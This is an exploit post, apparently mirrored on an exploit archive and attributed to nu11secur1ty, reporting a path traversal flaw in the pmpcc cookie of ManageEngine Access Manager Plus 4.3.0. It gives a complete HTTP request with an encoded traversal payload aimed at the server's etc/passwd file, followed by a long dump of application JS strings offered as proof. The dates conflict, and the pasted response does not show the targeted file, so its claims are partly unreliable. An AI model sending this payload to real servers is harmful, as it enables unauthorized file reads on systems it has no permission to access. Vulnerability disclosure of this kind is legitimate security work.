ManageEngin AMP 4.3.0 – File-path-traversal

  • 作者: nu11secur1ty
    日期: 2023-04-03
  • 类别:
  • 来源:
  • ## Exploit Title: ManageEngine Access Manager Plus 4.3.0 - File-path-traversal
    ## Author: nu11secur1ty
    ## Date: 11.22.2023
    ## Vendor:
    ## Software:
    ## Reference:
    ## Description:
    The `pmpcc` cookie is vulnerable to path traversal attacks, enabling
    read access to arbitrary files on the server.
    The testing payload
    was submitted in the pmpcc cookie.
    The requested file was returned in the application's response.
    The attacker easy can see all the JS structures of the server and can
    perform very dangerous actions.
    ## STATUS: HIGH Vulnerability
    [+] Exploits:
    GET /amp/webapi/?requestType=GET_AMP_JS_VALUES HTTP/1.1
    Host: localhost:9292
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
    AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
    Connection: close
    Cache-Control: max-age=0
    Cookie: pmpcc=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd;
    Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
    Sec-CH-UA-Mobile: ?0
    X-Requested-With: XMLHttpRequest
    Sec-CH-UA-Platform: Windows
    Referer: https://localhost:9292/AMPHome.html
    [+] Response:
    ,'js.pmp.helpCertRequest.subcontent10':'The issued certificate is
    e-mailed to the user who raises the request, the user who closes the
    request and also to those e-mail ids specified at the time of closing
    the request.'
    ,'js.admin.HelpDeskIntegrate.UsernameEgServiceNow':'ServiceNow login username'
    synchronization is scheduled to run on'
    ,'js.agent.csharp_Windows_Agent':'C# Windows Agent'
    ,'godaddy.importcsr.selectfileorpastecontent':'Either select a file or
    paste the CSR content.'
    ,'js.general.ShareToGroups':'Share resource to user groups'
    ,'jsp.admin.Support.User_Forums':'User Forums'
    ,'js.general.CreateResource.Dns_url_check':'Enter a valid URL . For
    cloud services (Rackspace and AWS IAM), the DNS name <br>looks like a
    URL (ex:https:\/\/\/v2.0)'
    ,'js.admin.RPA_Integration.About':'PAM360 renders bots that seamlessly
    integrate and perfectly fit into the pre-designed and automated
    integrations of the below listed RPA-powered platforms, to simulate
    the routine manual password retrieval from the PAM360 vault.'
    ,'js.discovery.loadhostnamefromfile':'From file'
    enter a valid Implementation Class'
    ,'js.general.GroupedResources':'Grouped Resources'
    ,'js.general.SlaveServer':'This operation is not permitted in Secondary Server.'
    ,'PROCESSID':'Process Id'
    fetched successfully'
    ,'assign.defaultdns.nodnsconfigured':'No default DNS available\/enabled'
    ,'js.discovery.usercredential_type':'Credential Type'
    high availability status every <input type=\"text\" class=\"txtbox\"
    name=\"check_duration\" value=\"{0}\" size=\"5\" maxlength=\"5\"
    style=\"width:60px\" onkeypress=\"if(event.keyCode==13)return false;\"
    > minutes.'
    ,'':'Please enter a valid number for
    Numeric Field Default Value.'
    ,'js.admin.HighAvailability.configured_successfully':'Configured Successfully'
    ,'js.generalSettings_searchTerm_Password_reset':'Password Reset,
    Reason for password reset, disable ticket id, waiting time, wait time
    for service account password reset, linux unix password reset'
    ,'letsencrypt.enter.domainnames':'Enter domain names'
    ,'js.discovery.resourcetype':'Resource Type'
    ,'js.HomeTab.UserTab':'Set this tab as default view for \'Users\''
    ,'':'Valid To'
    ,'js.general_Language_Changed_Successfully':'Language Changed Successfully'
    ,'':'AWS Credential'
    ,'auditpurge.helpnote1':'Enter 0 or leave the field blank to disable
    purging of audit trails.'
    ,'js.general.user.orgn_bulkManage':'Manage Organization'
    ,'js.rolename.SSH_KEY':'Create\/Add key'
    ,'':'Application Scaling'
    ,'lets.encrypt.requestreport':'Let\'s Encrypt Requests Report'
    ,'js.settings.breach_settings.disable_api':'Disable API Access'
    ,'js.cmd.delete.not_possible':'Command cannot be deleted as it is
    already added to the following command set(s).'
    ,'js.settings.notification.domaincontent':'Notify if domains are
    expiring within'
    ,'':'--Search UserName--'
    ,'jsp.admin.GeneralSetting.helpdesk_conf':'Configure the ticketing
    system settings in Admin >> General >> Ticketing System Integration.'
    ,'js.discovery.port':'Gateway Port'
    ,'usermanagement.showCertificates':'Show Certificates'
    ,'js.general.DestinationDirectoryCannotBeEmpty':'Destination directory
    cannot be empty'
    ,'js.sshreport.title':'SSH Resource Report'
    ,'js.settingsTitle1.UserManagement':'User Management'
    ,'js.passwordPolicy.setRange':'Enforce minimum or maximum password length'
    ,'js.commonstr.selectResources':'Select Resources'
    ,'RULENAME':'Rule Name'
    Group added successfully'
    ,'js.reports.SSHReports.title':'SSH Reports'
    ,'js.CommonStr.ValueIsLess':'value is less than 2'
    ,'js.discovery.discoverystatus':'Discovery Status'
    ,'js.settings.security_settings.Web_Access':'Web Access'
    ,'js.general.node_name_cannot_be_empty':'Node name cannot be empty'
    ,'js.deploy.audit':'Deploy Audit'
    ,'js.agentdiscovery.msca.title':'Microsoft Certificate Authority'
    user group(s) to exempt from access control.'
    ,'js.pki.SelectCertificateGroup':'Select Certificate Group(s)'
    ,'settings.metracker.note0':'Disable ME Tracker if you do not wish to
    allow ManageEngine to collect product usage details.'
    ,'SERVICENAME':'Service Name'
    ,'settings.metracker.note1':'Access Manager Plus server has to be
    restarted for the changes to take effect.'
    ,'js.general.NewPinMismatch':'New PIN Mismatch'
    ,'js.HomeTab.ResourceTab':'Set this tab as default view for \'Resources\''
    ,'js.admin.sdpop_change.tooltip':'Enabling this option will require
    your users to provide valid Change IDs for the validation of password
    access requests and other similar operations. Leaving this option
    unchecked requires the users to submit valid Request IDs for
    ,'js.admin.passwordrequests.Target_Resource_Selection_Alert':'Only 25
    resources can be selected'
    ,'js.customize.NumericField':'Numeric Field'
    ,'':'Please select a file to upload.'
    ,'js.AutoLogon.Remote_connections':'Remote Connections'
    ,'js.schedule.starttime':'Start Time'
    ,'':'Add keys to Access Manager Plus'
    ,'':'to complete the integration. For any
    further questions, please write to us at'
    ,'js.reportType.Option7.UserAuditReport':'Audit Report'
    ,'js.globalsign.reissue.order':'Reissue Order'
    ,'':'Build a platform of expected behavior
    for individual users and entities by mapping different user accounts'
    ,'':'Verify actionable reports that
    symbolize compromise with details about actual behavior and expected
    ,'js.resources.importcredential':'Import Credentials'
    ,'':'The Advanced Analytics module for
    PAM360, offered via ManageEngine Log360 UEBA, analyzes logs from
    different sources, including firewalls, routers, workstations,
    databases, file servers and cloud services. Any deviation from normal
    behavior is classified as a time, count, or pattern anomaly. It then
    gives actionable insight to the IT Administrator with the use of risk
    scores, anomaly trends, and intuitive reports.'
    ,'':'With Log360 UEBA analytics, you can:'
    ,'':'To activate Log360 UEBA for your PAM360
    instance, download Log360 UEBA from the below link and follow the
    instructions in this'
    ,'js.settingsTitle2.MailServer':'Mail Server'
    AMP Encryption Key'
    ,'':'E-mail Address'
    ,'amp.connection.connection_type':'Connection Type'
    ,'':'Diagnose anomalous user behavior based
    on activity time, count, and pattern.'
    ,'godaddy.contactphone':'Contact Phone'
    ,'js.general.HelpDeskIntegrate.ClassSameException':'Class name already
    implemented. Implement with some other class.'
    ,'':'Track abnormal entity behaviors in
    Windows devices, SQL servers, FTP servers, and network devices such as
    routers, firewalls, and switches.'
    ,'digicert.label.dcv.cname':'CNAME Token'
    ,'js.helpcontent.createuser':'User Creation '
    ,'pgpkeys.key.details':'Key Information'
    ,'js.resources.discovery.ResourceDiscoveryStatus.discovery':'Discovery Status'
    ,'js.HomeTab.TaskAuditView':'Task Audit'
    ,'pki.js.certs.certGroupsSharedByUserGroups':'Certificate Groups
    Shared With User Group(s)'
    ,'js.common.importcsr.format':'(File format should be .csr)'
    ,'pmp.vct.User_Audit_Configuration':'User Audit Configuration'
    ## Reproduce:
    ## Reference:
    ## Proof and Exploit:
    ## Time spent
    System Administrator - Infrastructure Engineer
    Penetration Testing Engineer
    Exploit developer at and
    0day Exploit Data Base
    home page:
    nu11secur1ty <>